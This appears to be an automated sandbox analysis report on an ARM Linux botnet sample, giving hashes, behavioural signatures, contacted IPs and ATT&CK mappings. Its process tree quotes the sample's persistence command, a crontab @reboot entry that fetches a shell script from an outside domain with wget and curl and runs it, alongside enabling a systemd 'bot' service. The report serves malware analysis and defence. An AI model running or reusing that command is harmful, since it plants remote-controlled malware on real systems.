Analysis
-
max time kernel
599s -
max time network
650s -
platform
debian-12_armhf -
resource
debian12-armhf-20240221-en -
resource tags
arch:armhfimage:debian12-armhf-20240221-enkernel:6.1.0-17-armmp-lpaelocale:en-usos:debian-12-armhfsystem -
submitted
27-10-2024 11:34
Static task
static1
Behavioral task
behavioral1
Sample
arm7
Resource
debian12-armhf-20240221-en
General
-
Target
arm7
-
Size
102KB
-
MD5
f89985f03f8a27ab418e05bc232e4387
-
SHA1
b57e7df8cf4013be718f56be205e14919101e87a
-
SHA256
15af70f91b8099d491f6d891cd063301b8e40e063aa0554294ec28cab71753c6
-
SHA512
d4a66a8054dbd4cfbe2865c64bfde1e3dff384b1504a04b8ee21384737960de425e1069a2de14b6972420c99fbc40f0d11a7568d059678837b01c5868cd336b9
-
SSDEEP
3072:lK8+viZckDqI5GaHSfCr8ZwTEEs2S8SjjIxX:lK8bZckDlGaHSfCr8iTEWSJjkxX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Renames itself 1 IoCs
Processes:
arm7pid process 1766 arm7 -
Unexpected DNS network traffic destination 64 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 65.21.1.106 Destination IP 185.181.61.24 Destination IP 5.161.109.23 Destination IP 152.53.15.127 Destination IP 65.21.1.106 Destination IP 80.152.203.134 Destination IP 194.36.144.87 Destination IP 194.36.144.87 Destination IP 5.161.109.23 Destination IP 70.34.254.19 Destination IP 185.181.61.24 Destination IP 139.84.165.176 Destination IP 202.61.197.122 Destination IP 81.169.136.222 Destination IP 139.84.165.176 Destination IP 185.181.61.24 Destination IP 70.34.254.19 Destination IP 137.220.52.23 Destination IP 80.152.203.134 Destination IP 178.254.22.166 Destination IP 5.161.109.23 Destination IP 178.254.22.166 Destination IP 217.160.70.42 Destination IP 152.53.15.127 Destination IP 65.21.1.106 Destination IP 168.235.111.72 Destination IP 51.158.108.203 Destination IP 5.161.109.23 Destination IP 5.161.109.23 Destination IP 5.161.109.23 Destination IP 51.158.108.203 Destination IP 168.235.111.72 Destination IP 65.21.1.106 Destination IP 194.36.144.87 Destination IP 81.169.136.222 Destination IP 65.21.1.106 Destination IP 202.61.197.122 Destination IP 64.176.6.48 Destination IP 70.34.254.19 Destination IP 202.61.197.122 Destination IP 152.53.15.127 Destination IP 51.158.108.203 Destination IP 185.181.61.24 Destination IP 70.34.254.19 Destination IP 51.158.108.203 Destination IP 70.34.254.19 Destination IP 51.158.108.203 Destination IP 194.36.144.87 Destination IP 217.160.70.42 Destination IP 5.161.109.23 Destination IP 178.254.22.166 Destination IP 70.34.254.19 Destination IP 217.160.70.42 Destination IP 80.152.203.134 Destination IP 194.36.144.87 Destination IP 152.53.15.127 Destination IP 51.158.108.203 Destination IP 64.176.6.48 Destination IP 64.176.6.48 Destination IP 217.160.70.42 Destination IP 202.61.197.122 Destination IP 178.254.22.166 Destination IP 64.176.6.48 Destination IP 51.158.108.203 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.T3XU0o crontab -
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
Processes:
arm7description ioc process File opened for modification /lib/systemd/system/bot.service arm7 -
Changes its process name 1 IoCs
Processes:
arm7description ioc pid process Changes the process name, possibly in an attempt to hide itself /bin/busybox ntpd 1766 arm7 -
Command and Scripting Interpreter: Unix Shell 1 TTPs 1 IoCs
Execute scripts via Unix Shell.
-
Processes:
systemctlarm7description ioc process File opened for reading /proc/filesystems systemctl File opened for reading /proc/mounts arm7
Processes
-
/tmp/arm7/tmp/arm7 massload1⤵
- Renames itself
- Modifies systemd
- Changes its process name
- Reads runtime system information
PID:1766 -
/bin/sh/bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"2⤵
- File and Directory Permissions Modification
PID:1769 -
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:1772 -
/usr/bin/crontabcrontab -l3⤵PID:1773
-
/bin/sh/bin/sh -c "/bin/systemctl enable bot"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:1776 -
/bin/systemctl/bin/systemctl enable bot3⤵
- Reads runtime system information
PID:1777
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Unix Shell
1Scheduled Task/Job
1Cron
1Persistence
Boot or Logon Autostart Execution
1XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
1XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Scheduled Task/Job
1Cron
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
302B
MD5a4e30f6ce6fb6cf00e133f3c93fb5449
SHA167b7de93a672ada4abfe11e339dc2e270c61b69d
SHA256a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede
SHA512893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25
-
Filesize
306B
MD5b32e71ac9a7a75ef83a5b90ad41a7312
SHA1d28c6dfc1e4a439d39ed44a02a28b48253bd7290
SHA256cbda160e0fdff8fe32d37f0aaed0ac570c8a2c805562fe9ea5f767da0493f0d3
SHA5128a4c3da43046c9d8538bbc312b9c3aca38267b602bad07e2a216ecd6b4e6af820de2e8a3989e9fdb34a6b70f410bdf98f30a8850c28fb353bcf14125760890a8